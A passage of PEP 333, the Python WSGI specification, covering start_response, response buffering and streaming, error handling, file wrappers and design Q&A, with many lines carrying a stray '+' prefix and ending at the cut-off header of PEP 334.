The second parameter passed to the application object is a callable of the form start_response(status, response_headers, exc_info=None). (As with all WSGI callables, the arguments must be supplied positionally, not by keyword.) The start_response callable is used to begin the HTTP response, and it must return a write(body_data) callable (see the Buffering and Streaming section, below).
+
The status argument is an HTTP “status” string like "200 OK" or "404 Not Found". That is, it is a string consisting of a Status-Code and a Reason-Phrase, in that order and separated by a single space, with no surrounding whitespace or other characters. (See RFC 2616, Section 6.1.1 for more information.) The string must not contain control characters, and must not be terminated with a carriage return, linefeed, or combination thereof.
+
The response_headers argument is a list of (header_name, header_value) tuples. It must be a Python list; i.e. type(response_headers) is ListType, and the server may change its contents in any way it desires. Each header_name must be a valid HTTP header field-name (as defined by RFC 2616, Section 4.2), without a trailing colon or other punctuation.
+
Each header_value must not include any control characters, including carriage returns or linefeeds, either embedded or at the end. (These requirements are to minimize the complexity of any parsing that must be performed by servers, gateways, and intermediate response processors that need to inspect or modify response headers.)
+
In general, the server or gateway is responsible for ensuring that correct headers are sent to the client: if the application omits a header required by HTTP (or other relevant specifications that are in effect), the server or gateway must add it. For example, the HTTP Date: and Server: headers would normally be supplied by the server or gateway.
+
(A reminder for server/gateway authors: HTTP header names are case-insensitive, so be sure to take that into consideration when examining application-supplied headers!)
+
Applications and middleware are forbidden from using HTTP/1.1 “hop-by-hop” features or headers, any equivalent features in HTTP/1.0, or any headers that would affect the persistence of the client’s connection to the web server. These features are the exclusive province of the actual web server, and a server or gateway should consider it a fatal error for an application to attempt sending them, and raise an error if they are supplied to start_response(). (For more specifics on “hop-by-hop” features and headers, please see the Other HTTP Features section below.)
+
The start_response callable must not actually transmit the response headers. Instead, it must store them for the server or gateway to transmit only after the first iteration of the application return value that yields a non-empty string, or upon the application’s first invocation of the write() callable. In other words, response headers must not be sent until there is actual body data available, or until the application’s returned iterable is exhausted. (The only possible exception to this rule is if the response headers explicitly include a Content-Length of zero.)
+
This delaying of response header transmission is to ensure that buffered and asynchronous applications can replace their originally intended output with error output, up until the last possible moment. For example, the application may need to change the response status from “200 OK” to “500 Internal Error”, if an error occurs while the body is being generated within an application buffer.
+
The exc_info argument, if supplied, must be a Python sys.exc_info() tuple. This argument should be supplied by the application only if start_response is being called by an error handler. If exc_info is supplied, and no HTTP headers have been output yet, start_response should replace the currently-stored HTTP response headers with the newly-supplied ones, thus allowing the application to “change its mind” about the output when an error has occurred.
+
However, if exc_info is provided, and the HTTP headers have already been sent, start_response must raise an error, and should raise the exc_info tuple. That is:
+
raise exc_info[0], exc_info[1], exc_info[2]
+
+
+
This will re-raise the exception trapped by the application, and in principle should abort the application. (It is not safe for the application to attempt error output to the browser once the HTTP headers have already been sent.) The application must not trap any exceptions raised by start_response, if it called start_response with exc_info. Instead, it should allow such exceptions to propagate back to the server or gateway. See Error Handling below, for more details.
+
The application may call start_response more than once, if and only if the exc_info argument is provided. More precisely, it is a fatal error to call start_response without the exc_info argument if start_response has already been called within the current invocation of the application. (See the example CGI gateway above for an illustration of the correct logic.)
+
Note: servers, gateways, or middleware implementing start_response should ensure that no reference is held to the exc_info parameter beyond the duration of the function’s execution, to avoid creating a circular reference through the traceback and frames involved. The simplest way to do this is something like:
+
def start_response(status, response_headers, exc_info=None):
+    if exc_info:
+        try:
+            pass    # do stuff w/exc_info here
+        finally:
+            exc_info = None    # Avoid circular ref.
+
+
+
The example CGI gateway provides another illustration of this technique.
+
+
Handling the Content-Length Header
+
If the application does not supply a Content-Length header, a server or gateway may choose one of several approaches to handling it. The simplest of these is to close the client connection when the response is completed.
+
Under some circumstances, however, the server or gateway may be able to either generate a Content-Length header, or at least avoid the need to close the client connection. If the application does not call the write() callable, and returns an iterable whose len() is 1, then the server can automatically determine Content-Length by taking the length of the first string yielded by the iterable.
+
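A sketch of that len() special case, assuming the gateway tracks whether write() was used; the function and flag names here are illustrative, and the result is assumed to be a sequence such as a list:
+
+def content_length_from_result(result, used_write):
+    """Return a length the gateway may advertise, or None (a sketch)."""
+    try:
+        if len(result) == 1 and not used_write:
+            # The single block's length is the whole body's length
+            return len(iter(result).next())
+    except TypeError:
+        pass    # no working __len__(); e.g. a generator-iterator
+    return None
+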
And, if the server and client both support HTTP/1.1 “chunked encoding”, then the server may use chunked encoding to send a chunk for each write() call or string yielded by the iterable, thus generating a Content-Length header for each chunk. This allows the server to keep the client connection alive, if it wishes to do so. Note that the server must comply fully with RFC 2616 when doing this, or else fall back to one of the other strategies for dealing with the absence of Content-Length.
+
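Under that strategy, each block would be framed as an HTTP/1.1 chunk, sketched below (out is any writable stream; the helper names are illustrative):
+
+def write_chunk(out, data):
+    # One HTTP/1.1 chunk: size in hex, CRLF, payload, CRLF
+    if data:
+        out.write('%x\r\n%s\r\n' % (len(data), data))
+
+def finish_chunked_body(out):
+    out.write('0\r\n\r\n')    # a zero-sized chunk ends the body
+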
(Note: applications and middleware must not apply any kind of Transfer-Encoding to their output, such as chunking or gzipping; as “hop-by-hop” operations, these encodings are the province of the actual web server/gateway. See Other HTTP Features below, for more details.)
+
+
+
+
Buffering and Streaming
+
Generally speaking, applications will achieve the best throughput by buffering their (modestly-sized) output and sending it all at once. This is a common approach in existing frameworks such as Zope: the output is buffered in a StringIO or similar object, then transmitted all at once, along with the response headers.
+
The corresponding approach in WSGI is for the application to simply return a single-element iterable (such as a list) containing the response body as a single string. This is the recommended approach for the vast majority of application functions that render HTML pages whose text easily fits in memory.
+
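For example, a buffered application might be sketched as follows (the page content is arbitrary):
+
+from StringIO import StringIO
+
+def buffered_app(environ, start_response):
+    buf = StringIO()
+    buf.write('<html><body>')
+    buf.write('Hello, buffered world!')
+    buf.write('</body></html>')
+    body = buf.getvalue()
+    start_response('200 OK', [('Content-type', 'text/html'),
+                              ('Content-length', str(len(body)))])
+    return [body]    # a one-element iterable: the whole response at once
+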
For large files, however, or for specialized uses of HTTP streaming (such as multipart “server push”), an application may need to provide output in smaller blocks (e.g. to avoid loading a large file into memory). It’s also sometimes the case that part of a response may be time-consuming to produce, but it would be useful to send ahead the portion of the response that precedes it.
+
In these cases, applications will usually return an iterator (often a generator-iterator) that produces the output in a block-by-block fashion. These blocks may be broken to coincide with multipart boundaries (for “server push”), or just before time-consuming tasks (such as reading another block of an on-disk file).
+
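A block-by-block producer, by contrast, might be sketched as a generator application (the blocks here are made up):
+
+from __future__ import generators    # needed on Python 2.2
+
+def streaming_app(environ, start_response):
+    start_response('200 OK', [('Content-type', 'text/plain')])
+    def produce():
+        for i in range(10):
+            # each yield might follow a time-consuming step, such as
+            # reading another block of an on-disk file
+            yield 'block %d\n' % i
+    return produce()
+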
WSGI servers, gateways, and middleware must not delay the transmission of any block; they must either fully transmit the block to the client, or guarantee that they will continue transmission even while the application is producing its next block. A server/gateway or middleware may provide this guarantee in one of three ways:
+
1. Send the entire block to the operating system (and request that any O/S buffers be flushed) before returning control to the application, OR
2. Use a different thread to ensure that the block continues to be transmitted while the application produces the next block.
3. (Middleware only) send the entire block to its parent gateway/server.
+
By providing this guarantee, WSGI allows applications to ensure that transmission will not become stalled at an arbitrary point in their output data. This is critical for proper functioning of e.g. multipart “server push” streaming, where data between multipart boundaries should be transmitted in full to the client.
+
+
Middleware Handling of Block Boundaries
+
In order to better support asynchronous applications and servers, middleware components must not block iteration waiting for multiple values from an application iterable. If the middleware needs to accumulate more data from the application before it can produce any output, it must yield an empty string.
+
To put this requirement another way, a middleware component must yield at least one value each time its underlying application yields a value. If the middleware cannot yield any other value, it must yield an empty string.
+
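A sketch of a conforming middleware iterable follows; the upper-casing stands in for a real transformation, and the buffering threshold is arbitrary:
+
+class Accumulator:
+    """Yield '' whenever a transformed block is not yet ready (a sketch)."""
+
+    def __init__(self, result, want=4096):
+        self.iterator = iter(result)
+        self.buffer = ''
+        self.want = want    # bytes to gather before transforming
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        try:
+            self.buffer += self.iterator.next()
+        except StopIteration:
+            if not self.buffer:
+                raise
+            out, self.buffer = self.buffer, ''
+            return out.upper()    # flush the tail (stand-in transform)
+        if len(self.buffer) < self.want:
+            return ''             # one (empty) value per input value
+        out, self.buffer = self.buffer, ''
+        return out.upper()        # stand-in transform
+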
This requirement ensures that asynchronous applications and servers can conspire to reduce the number of threads that are required to run a given number of application instances simultaneously.
+
Note also that this requirement means that middleware must return an iterable as soon as its underlying application returns an iterable. It is also forbidden for middleware to use the write() callable to transmit data that is yielded by an underlying application. Middleware may only use their parent server’s write() callable to transmit data that the underlying application sent using a middleware-provided write() callable.
+
+
+
The write() Callable
+
Some existing application framework APIs support unbuffered output in a different manner than WSGI. Specifically, they provide a “write” function or method of some kind to write an unbuffered block of data, or else they provide a buffered “write” function and a “flush” mechanism to flush the buffer.
+
Unfortunately, such APIs cannot be implemented in terms of WSGI’s “iterable” application return value, unless threads or other special mechanisms are used.
+
Therefore, to allow these frameworks to continue using an imperative API, WSGI includes a special write() callable, returned by the start_response callable.
+
New WSGI applications and frameworks should not use the write() callable if it is possible to avoid doing so. The write() callable is strictly a hack to support imperative streaming APIs. In general, applications should produce their output via their returned iterable, as this makes it possible for web servers to interleave other tasks in the same Python thread, potentially providing better throughput for the server as a whole.
+
The write() callable is returned by the start_response() callable, and it accepts a single parameter: a string to be written as part of the HTTP response body, that is treated exactly as though it had been yielded by the output iterable. In other words, before write() returns, it must guarantee that the passed-in string was either completely sent to the client, or that it is buffered for transmission while the application proceeds onward.
+
An application must return an iterable object, even if it uses write() to produce all or part of its response body. The returned iterable may be empty (i.e. yield no non-empty strings), but if it does yield non-empty strings, that output must be treated normally by the server or gateway (i.e., it must be sent or queued immediately). Applications must not invoke write() from within their return iterable, and therefore any strings yielded by the iterable are transmitted after all strings passed to write() have been sent to the client.
+
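For instance, an adapter for such an imperative “push” API might be sketched as:
+
+def imperative_app(environ, start_response):
+    # Legacy-style "push" output via the write() callable (a sketch)
+    write = start_response('200 OK', [('Content-type', 'text/plain')])
+    write('Hello ')
+    write('world!\n')
+    return []    # an (empty) iterable must still be returned
+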
+
+
+
Unicode Issues
+
HTTP does not directly support Unicode, and neither does this interface. All encoding/decoding must be handled by the application; all strings passed to or from the server must be standard Python byte strings, not Unicode objects. The result of using a Unicode object where a string object is required is undefined.
+
Note also that strings passed to start_response() as a status or as response headers must follow RFC 2616 with respect to encoding. That is, they must either be ISO-8859-1 characters, or use RFC 2047 MIME encoding.
+
On Python platforms where the str or StringType type is in fact Unicode-based (e.g. Jython, IronPython, Python 3000, etc.), all “strings” referred to in this specification must contain only code points representable in ISO-8859-1 encoding (\u0000 through \u00FF, inclusive). It is a fatal error for an application to supply strings containing any other Unicode character or code point. Similarly, servers and gateways must not supply strings to an application containing any other Unicode characters.
+
Again, all strings referred to in this specification must be of type str or StringType, and must not be of type unicode or UnicodeType. And, even if a given platform allows for more than 8 bits per character in str/StringType objects, only the lower 8 bits may be used, for any value referred to in this specification as a “string”.
+
+
+
Error Handling
+
In general, applications should try to trap their own, internal errors, and display a helpful message in the browser. (It is up to the application to decide what “helpful” means in this context.)
+
However, to display such a message, the application must not have actually sent any data to the browser yet, or else it risks corrupting the response. WSGI therefore provides a mechanism to either allow the application to send its error message, or be automatically aborted: the exc_info argument to start_response. Here is an example of its use:
+
import sys
+
+try:
+    # regular application code here
+    status = "200 Froody"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers)
+    return ["normal body goes here"]
+except:
+    # XXX should trap runtime issues like MemoryError, KeyboardInterrupt
+    #     in a separate handler before this bare 'except:'...
+    status = "500 Oops"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers, sys.exc_info())
+    return ["error body goes here"]
+
+
+
If no output has been written when an exception occurs, the call to start_response will return normally, and the application will return an error body to be sent to the browser. However, if any output has already been sent to the browser, start_response will reraise the provided exception. This exception should not be trapped by the application, and so the application will abort. The server or gateway can then trap this (fatal) exception and abort the response.
+
Servers should trap and log any exception that aborts an application or the iteration of its return value. If a partial response has already been written to the browser when an application error occurs, the server or gateway may attempt to add an error message to the output, if the already-sent headers indicate a text/* content type that the server knows how to modify cleanly.
+
Some middleware may wish to provide additional exception handling services, or intercept and replace application error messages. In such cases, middleware may choose to not re-raise the exc_info supplied to start_response, but instead raise a middleware-specific exception, or simply return without an exception after storing the supplied arguments. This will then cause the application to return its error body iterable (or invoke write()), allowing the middleware to capture and modify the error output. These techniques will work as long as application authors:
+
1. Always provide exc_info when beginning an error response
2. Never trap errors raised by start_response when exc_info is being provided
+
+
+
HTTP 1.1 Expect/Continue
+
Servers and gateways that implement HTTP 1.1 must provide transparent support for HTTP 1.1’s “expect/continue” mechanism. This may be done in any of several ways:
+
1. Respond to requests containing an Expect: 100-continue request with an immediate “100 Continue” response, and proceed normally.
2. Proceed with the request normally, but provide the application with a wsgi.input stream that will send the “100 Continue” response if/when the application first attempts to read from the input stream. The read request must then remain blocked until the client responds. (A sketch of such a stream appears after this list.)
3. Wait until the client decides that the server does not support expect/continue, and sends the request body on its own. (This is suboptimal, and is not recommended.)
+
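Here is a sketch of option 2’s input stream; send_continue stands for whatever callable the server uses to write the interim “100 Continue” response to the client connection, and all names are illustrative:
+
+class ContinueInput:
+    """wsgi.input wrapper: send "100 Continue" on first read (a sketch)."""
+
+    def __init__(self, stream, send_continue):
+        self.stream = stream
+        self.send_continue = send_continue
+        self.sent = False
+
+    def _first_read(self):
+        if not self.sent:
+            self.sent = True
+            self.send_continue()    # emit the interim response, once
+
+    def read(self, size=-1):
+        self._first_read()
+        return self.stream.read(size)
+
+    def readline(self):
+        self._first_read()
+        return self.stream.readline()
+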
Note that these behavior restrictions do not apply for HTTP 1.0 requests, or for requests that are not directed to an application object. For more information on HTTP 1.1 Expect/Continue, see RFC 2616, sections 8.2.3 and 10.1.1.
+
+
+
Other HTTP Features
+
In general, servers and gateways should “play dumb” and allow the application complete control over its output. They should only make changes that do not alter the effective semantics of the application’s response. It is always possible for the application developer to add middleware components to supply additional features, so server/gateway developers should be conservative in their implementation. In a sense, a server should consider itself to be like an HTTP “gateway server”, with the application being an HTTP “origin server”. (See RFC 2616, section 1.3, for the definition of these terms.)
+
However, because WSGI servers and applications do not communicate via HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to WSGI internal communications. WSGI applications must not generate any “hop-by-hop” headers, attempt to use HTTP features that would require them to generate such headers, or rely on the content of any incoming “hop-by-hop” headers in the environ dictionary. WSGI servers must handle any supported inbound “hop-by-hop” headers on their own, such as by decoding any inbound Transfer-Encoding, including chunked encoding if applicable.
+
Applying these principles to a variety of HTTP features, it should be clear that a server may handle cache validation via the If-None-Match and If-Modified-Since request headers and the Last-Modified and ETag response headers. However, it is not required to do this, and the application should perform its own cache validation if it wants to support that feature, since the server/gateway is not required to do such validation.
+
Similarly, a server may re-encode or transport-encode an application’s response, but the application should use a suitable content encoding on its own, and must not apply a transport encoding. A server may transmit byte ranges of the application’s response if requested by the client, and the application doesn’t natively support byte ranges. Again, however, the application should perform this function on its own if desired.
+
Note that these restrictions on applications do not necessarily mean that every application must reimplement every HTTP feature; many HTTP features can be partially or fully implemented by middleware components, thus freeing both server and application authors from implementing the same features over and over again.
+
+
+
Thread Support
+
Thread support, or lack thereof, is also server-dependent. Servers that can run multiple requests in parallel should also provide the option of running an application in a single-threaded fashion, so that applications or frameworks that are not thread-safe may still be used with that server.
+
+
+
+
Implementation/Application Notes
+
+
Server Extension APIs
+
Some server authors may wish to expose more advanced APIs that application or framework authors can use for specialized purposes. For example, a gateway based on mod_python might wish to expose part of the Apache API as a WSGI extension.
+
In the simplest case, this requires nothing more than defining an environ variable, such as mod_python.some_api. But, in many cases, the possible presence of middleware can make this difficult. For example, an API that offers access to the same HTTP headers that are found in environ variables, might return different data if environ has been modified by middleware.
+
In general, any extension API that duplicates, supplants, or bypasses some portion of WSGI functionality runs the risk of being incompatible with middleware components. Server/gateway developers should not assume that nobody will use middleware, because some framework developers specifically intend to organize or reorganize their frameworks to function almost entirely as middleware of various kinds.
+
So, to provide maximum compatibility, servers and gateways that provide extension APIs that replace some WSGI functionality must design those APIs so that they are invoked using the portion of the API that they replace. For example, an extension API to access HTTP request headers must require the application to pass in its current environ, so that the server/gateway may verify that HTTP headers accessible via the API have not been altered by middleware. If the extension API cannot guarantee that it will always agree with environ about the contents of HTTP headers, it must refuse service to the application, e.g. by raising an error, returning None instead of a header collection, or whatever is appropriate to the API.
+
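A sketch of such a self-verifying extension API follows; every name here (including the example.server_headers key) is hypothetical:
+
+def get_native_headers(environ):
+    """Return the gateway's native header object, or None (a sketch)."""
+    native = environ.get('example.server_headers')
+    if native is None:
+        return None         # the extension is not offered
+    for name, value in native.items():
+        key = 'HTTP_' + name.upper().replace('-', '_')
+        if environ.get(key) != value:
+            return None     # middleware altered environ: refuse service
+    return native
+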
Similarly, if an extension API provides an alternate means of writing response data or headers, it should require the start_response callable to be passed in, before the application can obtain the extended service. If the object passed in is not the same one that the server/gateway originally supplied to the application, it cannot guarantee correct operation and must refuse to provide the extended service to the application.
+
These guidelines also apply to middleware that adds information such as parsed cookies, form variables, sessions, and the like to environ. Specifically, such middleware should provide these features as functions which operate on environ, rather than simply stuffing values into environ. This helps ensure that information is calculated from environ after any middleware has done any URL rewrites or other environ modifications.
+
It is very important that these “safe extension” rules be followed by both server/gateway and middleware developers, in order to avoid a future in which middleware developers are forced to delete any and all extension APIs from environ to ensure that their mediation isn’t being bypassed by applications using those extensions!
+
+
+
Application Configuration
+
This specification does not define how a server selects or obtains an application to invoke. These and other configuration options are highly server-specific matters. It is expected that server/gateway authors will document how to configure the server to execute a particular application object, and with what options (such as threading options).
+
Framework authors, on the other hand, should document how to create an application object that wraps their framework’s functionality. The user, who has chosen both the server and the application framework, must connect the two together. However, since both the framework and the server now have a common interface, this should be merely a mechanical matter, rather than a significant engineering effort for each new server/framework pair.
+
Finally, some applications, frameworks, and middleware may wish to use the environ dictionary to receive simple string configuration options. Servers and gateways should support this by allowing an application’s deployer to specify name-value pairs to be placed in environ. In the simplest case, this support can consist merely of copying all operating system-supplied environment variables from os.environ into the environ dictionary, since the deployer in principle can configure these externally to the server, or in the CGI case they may be able to be set via the server’s configuration files.
+
Applications should try to keep such required variables to a minimum, since not all servers will support easy configuration of them. Of course, even in the worst case, persons deploying an application can create a script to supply the necessary configuration values:
+
from the_app import application
+
+def new_app(environ, start_response):
+    environ['the_app.configval1'] = 'something'
+    return application(environ, start_response)
+
+
+
But, most existing applications and frameworks will probably only need a single configuration value from environ, to indicate the location of their application or framework-specific configuration file(s). (Of course, applications should cache such configuration, to avoid having to re-read it upon each invocation.)
+
+
+
URL Reconstruction
+
If an application wishes to reconstruct a request’s complete URL, it may do so using the following algorithm, contributed by Ian Bicking:
+
from urllib import quote
+url = environ['wsgi.url_scheme']+'://'
+
+if environ.get('HTTP_HOST'):
+    url += environ['HTTP_HOST']
+else:
+    url += environ['SERVER_NAME']
+
+    if environ['wsgi.url_scheme'] == 'https':
+        if environ['SERVER_PORT'] != '443':
+            url += ':' + environ['SERVER_PORT']
+    else:
+        if environ['SERVER_PORT'] != '80':
+            url += ':' + environ['SERVER_PORT']
+
+url += quote(environ.get('SCRIPT_NAME', ''))
+url += quote(environ.get('PATH_INFO', ''))
+if environ.get('QUERY_STRING'):
+    url += '?' + environ['QUERY_STRING']
+
+
+
Note that such a reconstructed URL may not be precisely the same URI as requested by the client. Server rewrite rules, for example, may have modified the client’s originally requested URL to place it in a canonical form.
+
+
+
Supporting Older (<2.2) Versions of Python
+
Some servers, gateways, or applications may wish to support older (<2.2) versions of Python. This is especially important if Jython is a target platform, since as of this writing a production-ready version of Jython 2.2 is not yet available.
+
For servers and gateways, this is relatively straightforward: servers and gateways targeting pre-2.2 versions of Python must simply restrict themselves to using only a standard “for” loop to iterate over any iterable returned by an application. This is the only way to ensure source-level compatibility with both the pre-2.2 iterator protocol (discussed further below) and “today’s” iterator protocol (see PEP 234).
+
(Note that this technique necessarily applies only to servers, gateways, or middleware that are written in Python. Discussion of how to use iterator protocol(s) correctly from other languages is outside the scope of this PEP.)
+
For applications, supporting pre-2.2 versions of Python is slightly more complex:
+
• You may not return a file object and expect it to work as an iterable, since before Python 2.2, files were not iterable. (In general, you shouldn’t do this anyway, because it will perform quite poorly most of the time!) Use wsgi.file_wrapper or an application-specific file wrapper class. (See Optional Platform-Specific File Handling for more on wsgi.file_wrapper, and an example class you can use to wrap a file as an iterable.)
• If you return a custom iterable, it must implement the pre-2.2 iterator protocol. That is, provide a __getitem__ method that accepts an integer key, and raises IndexError when exhausted. (Note that built-in sequence types are also acceptable, since they also implement this protocol.)
+
Finally, middleware that wishes to support pre-2.2 versions of Python, and iterates over application return values or itself returns an iterable (or both), must follow the appropriate recommendations above.
+
(Note: It should go without saying that to support pre-2.2 versions of Python, any server, gateway, application, or middleware must also use only language features available in the target version, use 1 and 0 instead of True and False, etc.)
+
+
+
Optional Platform-Specific File Handling
+
Some operating environments provide special high-performance file-transmission facilities, such as the Unix sendfile() call. Servers and gateways may expose this functionality via an optional wsgi.file_wrapper key in the environ. An application may use this “file wrapper” to convert a file or file-like object into an iterable that it then returns, e.g.:
+
if 'wsgi.file_wrapper' in environ:
+    return environ['wsgi.file_wrapper'](filelike, block_size)
+else:
+    return iter(lambda: filelike.read(block_size), '')
+
+
+

If the server or gateway supplies wsgi.file_wrapper, it must be +a callable that accepts one required positional parameter, and one +optional positional parameter. The first parameter is the file-like +object to be sent, and the second parameter is an optional block +size “suggestion” (which the server/gateway need not use). The +callable must return an iterable object, and must not perform +any data transmission until and unless the server/gateway actually +receives the iterable as a return value from the application. +(To do otherwise would prevent middleware from being able to interpret +or override the response data.)

+

To be considered “file-like”, the object supplied by the application +must have a read() method that takes an optional size argument. +It may have a close() method, and if so, the iterable returned +by wsgi.file_wrapper must have a close() method that +invokes the original file-like object’s close() method. If the +“file-like” object has any other methods or attributes with names +matching those of Python built-in file objects (e.g. fileno()), +the wsgi.file_wrapper may assume that these methods or +attributes have the same semantics as those of a built-in file object.

+

The actual implementation of any platform-specific file handling must occur after the application returns, and the server or gateway checks to see if a wrapper object was returned. (Again, because of the presence of middleware, error handlers, and the like, it is not guaranteed that any wrapper created will actually be used.)

Apart from the handling of close(), the semantics of returning a file wrapper from the application should be the same as if the application had returned iter(filelike.read, ''). In other words, transmission should begin at the current position within the “file” at the time that transmission begins, and continue until the end is reached.

Of course, platform-specific file transmission APIs don’t usually accept arbitrary “file-like” objects. Therefore, a wsgi.file_wrapper has to introspect the supplied object for things such as a fileno() (Unix-like OSes) or a java.nio.FileChannel (under Jython) in order to determine if the file-like object is suitable for use with the platform-specific API it supports.
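As an illustration, a server's wrapper factory might dispatch as follows. This is only a sketch: FileWrapper is the portable class shown below, while SendfileWrapper is a hypothetical platform-specific wrapper, not anything defined by this specification:

def make_file_wrapper(filelike, block_size=8192):
    # Prefer the platform API when the object exposes a real file
    # descriptor; otherwise fall back to the portable wrapper.
    if hasattr(filelike, 'fileno'):
        return SendfileWrapper(filelike, block_size)   # hypothetical
    return FileWrapper(filelike, block_size)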


Note that even if the object is not suitable for the platform API, the wsgi.file_wrapper must still return an iterable that wraps read() and close(), so that applications using file wrappers are portable across platforms. Here’s a simple platform-agnostic file wrapper class, suitable for old (pre 2.2) and new Pythons alike:

class FileWrapper:

    def __init__(self, filelike, blksize=8192):
        self.filelike = filelike
        self.blksize = blksize
        if hasattr(filelike, 'close'):
            self.close = filelike.close

    def __getitem__(self, key):
        data = self.filelike.read(self.blksize)
        if data:
            return data
        raise IndexError

and here is a snippet from a server/gateway that uses it to provide access to a platform-specific API:

environ['wsgi.file_wrapper'] = FileWrapper
result = application(environ, start_response)

try:
    if isinstance(result, FileWrapper) and can_transmit(result.filelike):
        # result.filelike is usable with the platform-specific API,
        # so use that API to transmit the result.  (can_transmit()
        # and platform_transmit() are hypothetical server internals,
        # named only to make this pseudocode concrete.)
        platform_transmit(result.filelike)
    else:
        # normal iterable handling loop; write() stands in for the
        # server's transmission of a data block to the client
        for data in result:
            write(data)
finally:
    if hasattr(result, 'close'):
        result.close()

Questions and Answers

  1. Why must environ be a dictionary? What’s wrong with using a subclass?

     The rationale for requiring a dictionary is to maximize portability between servers. The alternative would be to define some subset of a dictionary’s methods as being the standard and portable interface. In practice, however, most servers will probably find a dictionary adequate to their needs, and thus framework authors will come to expect the full set of dictionary features to be available, since they will be there more often than not. But, if some server chooses not to use a dictionary, then there will be interoperability problems despite that server’s “conformance” to spec. Therefore, making a dictionary mandatory simplifies the specification and guarantees interoperability.

     Note that this does not prevent server or framework developers from offering specialized services as custom variables inside the environ dictionary. This is the recommended approach for offering any such value-added services.

  2. Why can you call write() and yield strings/return an iterable? Shouldn’t we pick just one way?

     If we supported only the iteration approach, then current frameworks that assume the availability of “push” suffer. But, if we only support pushing via write(), then server performance suffers for transmission of e.g. large files (if a worker thread can’t begin work on a new request until all of the output has been sent). Thus, this compromise allows an application framework to support both approaches, as appropriate, but with only a little more burden to the server implementor than a push-only approach would require.

  3. What’s the close() for?

     When writes are done during the execution of an application object, the application can ensure that resources are released using a try/finally block. But, if the application returns an iterable, any resources used will not be released until the iterable is garbage collected. The close() idiom allows an application to release critical resources at the end of a request, and it’s forward-compatible with the support for try/finally in generators that’s proposed by PEP 325.

  4. Why is this interface so low-level? I want feature X! (e.g. cookies, sessions, persistence, …)

     This isn’t Yet Another Python Web Framework. It’s just a way for frameworks to talk to web servers, and vice versa. If you want these features, you need to pick a web framework that provides the features you want. And if that framework lets you create a WSGI application, you should be able to run it in most WSGI-supporting servers. Also, some WSGI servers may offer additional services via objects provided in their environ dictionary; see the applicable server documentation for details. (Of course, applications that use such extensions will not be portable to other WSGI-based servers.)

  5. Why use CGI variables instead of good old HTTP headers? And why mix them in with WSGI-defined variables?

     Many existing web frameworks are built heavily upon the CGI spec, and existing web servers know how to generate CGI variables. In contrast, alternative ways of representing inbound HTTP information are fragmented and lack market share. Thus, using the CGI “standard” seems like a good way to leverage existing implementations. As for mixing them with WSGI variables, separating them would just require two dictionary arguments to be passed around, while providing no real benefits.

  6. What about the status string? Can’t we just use the number, passing in 200 instead of "200 OK"?

     Doing this would complicate the server or gateway, by requiring them to have a table of numeric statuses and corresponding messages. By contrast, it is easy for an application or framework author to type the extra text to go with the specific response code they are using, and existing frameworks often already have a table containing the needed messages. So, on balance it seems better to make the application/framework responsible, rather than the server or gateway.

  7. Why is wsgi.run_once not guaranteed to run the app only once?

     Because it’s merely a suggestion to the application that it should “rig for infrequent running”. This is intended for application frameworks that have multiple modes of operation for caching, sessions, and so forth. In a “multiple run” mode, such frameworks may preload caches, and may not write e.g. logs or session data to disk after each request. In “single run” mode, such frameworks avoid preloading and flush all necessary writes after each request.

     However, in order to test an application or framework to verify correct operation in the latter mode, it may be necessary (or at least expedient) to invoke it more than once. Therefore, an application should not assume that it will definitely not be run again, just because it is called with wsgi.run_once set to True.

  8. Feature X (dictionaries, callables, etc.) is ugly for use in application code; why don’t we use objects instead?

     All of these implementation choices of WSGI are specifically intended to decouple features from one another; recombining these features into encapsulated objects makes it somewhat harder to write servers or gateways, and an order of magnitude harder to write middleware that replaces or modifies only small portions of the overall functionality.

     In essence, middleware wants to have a “Chain of Responsibility” pattern, whereby it can act as a “handler” for some functions, while allowing others to remain unchanged. This is difficult to do with ordinary Python objects, if the interface is to remain extensible. For example, one must use __getattr__ or __getattribute__ overrides, to ensure that extensions (such as attributes defined by future WSGI versions) are passed through.

     This type of code is notoriously difficult to get 100% correct, and few people will want to write it themselves. They will therefore copy other people’s implementations, but fail to update them when the person they copied from corrects yet another corner case.

     Further, this necessary boilerplate would be pure excise, a developer tax paid by middleware developers to support a slightly prettier API for application framework developers. But, application framework developers will typically only be updating one framework to support WSGI, and in a very limited part of their framework as a whole. It will likely be their first (and maybe their only) WSGI implementation, and thus they will likely implement with this specification ready to hand. Thus, the effort of making the API “prettier” with object attributes and suchlike would likely be wasted for this audience.

     We encourage those who want a prettier (or otherwise improved) WSGI interface for use in direct web application programming (as opposed to web framework development) to develop APIs or frameworks that wrap WSGI for convenient use by application developers. In this way, WSGI can remain conveniently low-level for server and middleware authors, while not being “ugly” for application developers.

Proposed/Under Discussion

These items are currently being discussed on the Web-SIG and elsewhere, or are on the PEP author’s “to-do” list:

  • Should wsgi.input be an iterator instead of a file? This would help for asynchronous applications and chunked-encoding input streams.
  • Optional extensions are being discussed for pausing iteration of an application’s output until input is available or until a callback occurs.
  • Add a section about synchronous vs. asynchronous apps and servers, the relevant threading models, and issues/design goals in these areas.

Acknowledgements

Thanks go to the many folks on the Web-SIG mailing list whose thoughtful feedback made this revised draft possible. Especially:

  • Gregory “Grisha” Trubetskoy, author of mod_python, who beat up on the first draft as not offering any advantages over “plain old CGI”, thus encouraging me to look for a better approach.
  • Ian Bicking, who helped nag me into properly specifying the multithreading and multiprocess options, as well as badgering me to provide a mechanism for servers to supply custom extension data to an application.
  • Tony Lownds, who came up with the concept of a start_response function that took the status and headers, returning a write function. His input also guided the design of the exception handling facilities, especially in the area of allowing for middleware that overrides application error messages.
  • Alan Kennedy, whose courageous attempts to implement WSGI-on-Jython (well before the spec was finalized) helped to shape the “supporting older versions of Python” section, as well as the optional wsgi.file_wrapper facility.
  • Mark Nottingham, who reviewed the spec extensively for issues with HTTP RFC compliance, especially with regard to HTTP/1.1 features that I didn’t even know existed until he pointed them out.


Source: https://github.com/python/peps/blob/main/peps/pep-0333.rst



PEP 334 – Simple Coroutines via SuspendIteration

Author: Clark C. Evans <cce at clarkevans.com>
Status: Withdrawn
Type: Standards Track
Created: 26-Aug-2004
Python-Version: 3.0
Post-History:

Abstract

